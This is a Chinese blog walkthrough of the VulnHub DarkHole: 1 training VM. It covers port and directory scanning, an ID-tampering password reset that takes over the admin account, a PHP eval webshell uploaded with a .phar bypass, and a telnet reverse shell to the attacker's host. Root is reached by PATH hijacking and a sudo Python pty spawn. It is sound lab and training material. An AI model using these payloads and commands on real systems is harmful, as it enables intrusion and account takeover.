Vulnhub--DarkHole: 1

最新推荐文章于 2024-04-29 21:58:18 发布
最新推荐文章于 2024-04-29 21:58:18 发布
阅读量130 收藏
点赞数
文章标签: linux php 运维 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45168704/article/details/131200655
版权

0x01靶机介绍

项目Value
项目地址https://vulnhub.com/entry/darkhole-1,724/
镜像链接https://download.vulnhub.com/darkhole/DarkHole.zip
作者Jehad Alqurashi
发布日期2021年7月18日
系列DarkHole
难度Easy
目的获取root权限

0x02靶机搭建

工具:VMware Workstation 17.0
镜像:DarkHole.zip

搭建方式:

先将下载的zip文件解压
VMware Workstation 17.0:
1.文件->打开–>DarkHole_1.ovf,配置默认即可

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.开启我们的攻击机kali(NAT)和靶机

NAT网段:192.168.52.0/24
kali的IP地址:192.168.52.129

0x03渗透流程

一、信息收集

1.主机发现
arp-scan -l

192.168.52.130即为靶机
在这里插入图片描述

2.扫描主机端口信息
nmap -sS -sV 192.168.52.130

这里看对方开启了22端口和80端口,推测后面可能需要ssh协议连接
在这里插入图片描述

访问一下80端口:
http://192.168.52.130:80
在这里插入图片描述
和官方文档里的界面一样,ok下一步

3.目录扫描
dirb http://192.168.52.130

在这里插入图片描述
看到这里扫描出来一个upload目录,极有可能是后面要用到文件上传

再用其他工具扫一下目录

dirsearch -u 192.168.52.130

在这里插入图片描述
扫描完后主要看状态码200的地址,

/dashboard.php   //没权限访问
/config       //里面存放一个database文件,但是文件没有内容
/index.php/login/  //一个看起来没什么用的界面,里面可能有作者留下的线索
/login.php    //登陆界面
/register.php    //注册界面
/upload/      //文件上传的地址,感觉后面可能会用到,里面存放一张图片

二、漏洞挖掘和利用

1. 越权

进入login.php,先试一下弱口令(失败)

用户名:admin
密码:123456/Dimond/Spark/DarkHole/admin

直接注册一个号,然后登陆
在这里插入图片描述
在这里插入图片描述
可以看到浏览器地址栏中的请求带有id选项
在这里插入图片描述
我们输入id=1回显不能访问其他用户
在这里插入图片描述
这里使用Burp抓包,然后把Cookie删掉又访问了下,发现id=2也访问不了,看来是Cookie锁死了id
尝试其他方法:
这里有两种思路,使用burp抓包信息修改和密码修改,可以尝试下sql注入,但是再抓包修改密码的时候发现数据包包含id信息
在这里插入图片描述
修改id=1并发包修改成功。

使用admin账户登陆密码为test
在这里插入图片描述

2. 文件上传

发现文件上传点,直接上传一个一句话木马

<?php @eval($_POST['cmd']); ?>


看来做了限制
修改上传文件后缀看看能不能绕过.phar
在这里插入图片描述

我们可以在

http://192.168.52.130/upload/

找见上传的文件
蚁剑直接连
在这里插入图片描述
在这里插入图片描述
低权限,查找下关键信息,看看能不能进行提权

3. 提权

kali开启nc端口7777

nc -lvvp 7777

蚁剑执行代码反弹shell

mknod a p; telnet 192.168.52.129 7777 0<a | /bin/bash 1>a

在这里插入图片描述
整个交互式shell界面

python3 -c "import pty;pty.spawn('/bin/bash')"


cat /etc/passwd | grep /bin/bash

查找了一下目前具有bash权限的用户
在这里插入图片描述
然后再用户john的家目录里发现了以下文件
在这里插入图片描述

ls -ll

查看一下文件的权限发现toto文件具有执行权限
在这里插入图片描述
在这里插入图片描述
可以看到当我们执行了toto文件后它以john的身份执行了一个id命令,
我们可以写一个环境变量,来以john的身份生成一个终端

echo "/bin/bash" > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

在这里插入图片描述
这里我们就有权限去访问john家目录下的文件了,得到密码root123
在这里插入图片描述
尝试直接切换root权限失败

sudo su
root123

在这里插入图片描述
执行了下sudo -l 发现john用户可以以root身份执行file.py文件
在这里插入图片描述
我们写入命令,然后运行这个文件即可提权成功

echo "import pty;pty.spawn('/bin/bash')" > file.py
sudo python3 /home/john/file.py

在这里插入图片描述

巴鸽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
靶场练习 NO.26 DarkHole1 任意账号重置登录管理员账号,phtml特殊后缀解析上传成功,pkexec提权或者修改环境变量伪造id命令为bash+sudo
YouthBelief的博客
03-08 778
DarkHole10x00 环境准备0x01 信息收集步骤一: ip探测步骤二:端口服务识别0x02 漏洞探测步骤一:80端口探测步骤二:注册后登录后台测漏洞步骤三:测试上述漏洞任意账号密码重置步骤四:登录id为1的账号(应该为管理员)步骤五:上传php木马(失败,黑名单)(1)上传php尝试(2)上传.txt .aaa尝试步骤六:尝试黑名单绕过(1)确定信息(2)尝试apache多后缀解析(失败)(3)尝试.htaccess(失败)(4) PHP大写绕过(上传成功,不解析)(5)php其余后缀(phtml
Vulnhub--DarkHole:2
weixin_45168704的博客
06-14 192
DarkHole2
Vulnhub-DARKHOLE: 2
Re1_zf的博客
02-06 216
1、git源码泄露可以用git相关命令,比如git log和git show,都可以快速定位敏感信息2、sqlmap进行测试时,有时网站需要指定cookie3、ssh -L可以进行端口转发,语法类参考ssh -L 9999:127.0.0.1:9999 [email protected]、脚本反弹shell5、.bash_history很有可能隐藏着敏感信息6、简单的sudo提权。
Vulnhub-DARKHOLE: 1渗透
laoyanCZ的博客
12-02 982
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
vulnhub-Nagini.txt
06-10
Nagini
vulnhub靶场库中 DC:1
07-06
针对初学者对vulnhub靶场库中DC:1有一定的认知和了解,你会学到一些东西的
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
13 Linux实操篇-网络配置
qq_74289024的博客
04-23 1044
子网ip 与网关。
Linux多进程(五) 进程池 C++实现
Lyajpunov的博客
04-26 800
进程池是一种并发编程模式,用于管理和重用多个处理任务的进程。它通常用于需要频繁创建和销毁进程的情况,以避免因此产生的开销。减少进程创建销毁的开销:避免频繁创建和销毁进程所带来的系统资源开销。提高系统响应速度:由于进程已经初始化并且一直保持在内存中,可以立即分配执行任务,减少了任务等待时间。控制资源使用:通过限制进程池中的进程数量,可以控制系统资源的使用情况,避免资源过度消耗。
Linux——web服务配置
Xinan_____的博客
04-23 1130
GET:请求获取指定资源的表示形式。使用GET方法,客户端请求服务器发送某个资源。POST:向指定资源提交数据,用于处理表单提交、文件上传等操作。PUT:向指定资源位置上传其最新内容,用于更新资源。DELETE:请求服务器删除指定资源。HEAD:请求获取与实体相对应的头部信息,用于获取资源的元数据。OPTIONS:请求查询服务器支持的HTTP方法。TRACE:请求服务器回显收到的请求消息,用于测试或诊断。200 OK:请求成功。:永久重定向,请求的资源已经被分配了新的。
Linux:浏览器访问网站的基本流程(优先级从先到后)
fox_kang的博客
04-28 605
浏览器访问网站的基本流程(优先级从先到后) 首先查找浏览器是否存在该网站的访问缓存 其次查找本机的域名解析服务器 windows:C:\Windows\System32\drivers\etc\hosts Linux:/etc/hosts 使用外部的域名解析服务器解析(例如:114.114.114.114) 第一步:浏览器使用域名访问www.bilibili.com.网站 第二步:首先去访问根域名解析服务器查询,根服务器返回.com域名解析服务器地址==(这里的根域名解析服务器不会直接给出域名对应的
Linux 抽象命名空间(Abstract Namespace)简介
日拱一卒,玉汝于成
04-25 584
与传统的 UDS 不同,抽象命名空间并不在文件系统中创建实际文件,而是仅存在于内核内存中,其名称以 localabstract: 作为前缀。在这个例子中,我们创建了一个名为 my_abstract_namespace 的抽象命名空间,并将其绑定到了刚创建的 Unix 套接字上。要在 Linux 系统中生成一个抽象命名空间,通常需要使用编程语言的套接字 API 来创建一个 Unix 域套接字,并将其绑定到一个以 localabstract: 开头的特殊路径。
arm架构Linux5.0内核连接脚本文件vmlinux.lds.S分析
jianjian的博客
04-23 980
vmlinux.lds.S 是 Linux 内核中用于链接的脚本文件,用于定义内核对象文件的内存布局,即它告诉链接器如何将不同的内核代码段和数据段组合成一个最终的内核映像 vmlinux。编译内核源码生成内核文件的过程分两步,一个是“编译”,另一个是“链接”的过程,vmlinux.lds.S要做的就是告诉编译器如何链接编译好的各个内核.o文件,从而生成vmlinux文件。
linux的“>”和“>>”
qq_45212655的博客
04-24 461
文件存在,新的输出将被添加到文件的内容之后;如果文件不存在,将会创建一个新文件。文件存在,它的内容将被新的输出覆盖;如果文件不存在,将会创建一个新文件。都是用于文件重定向的操作符,它们用于将命令的输出发送到文件中。用于创建一个新文件或覆盖现有文件的内容。用于将输出附加到现有文件的末尾,而不是覆盖它。
Linux中的YUM源仓库和NFS文件共享服务
最新发布
2402_83805984的博客
04-29 442
yum是一个基于RPM包(是Red-Hat Package Manager红帽软件包管理器的缩写)构建的软件更新机制,能够自动解决软件包之间的依赖关系=,解决了日常工作中的大量查找安装依赖包的时间。NFS是一种基于TCP/IP传输的网络文件系统协议,最初由sun公司开发,通过NFS协议。客户机可以向访问本地目录一样访问远程NFS服务器中的共享资源。NFS也是NAS存储设备必然支持的一种协议,但是因为没有用户认证机制,而且数据在网络上明文传输、安全性很差,所以一般只能在局域网中使用。
Linux--内核移植(二)移植流程及驱动修改
qq_47258284的博客
04-23 1057
一、官方开发板内核测试本文来总结一下如何将 NXP官方提供的Linux内核移植到正点原子的开发板上。一、官方开发板内核测试NXP提供的Linux源码肯定是可以在自己的开发板上运行下去的,所以我们肯定是以 I.MX6ULL EVK开发板为参考,然后将Linux内核移植到开发板上的。1.修改顶层Makefile修改顶层Makefile,直接在顶层Makefile文件里面定义ARCH和这两个的变量值为 arm和 arm-linux-gnueabihf-。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值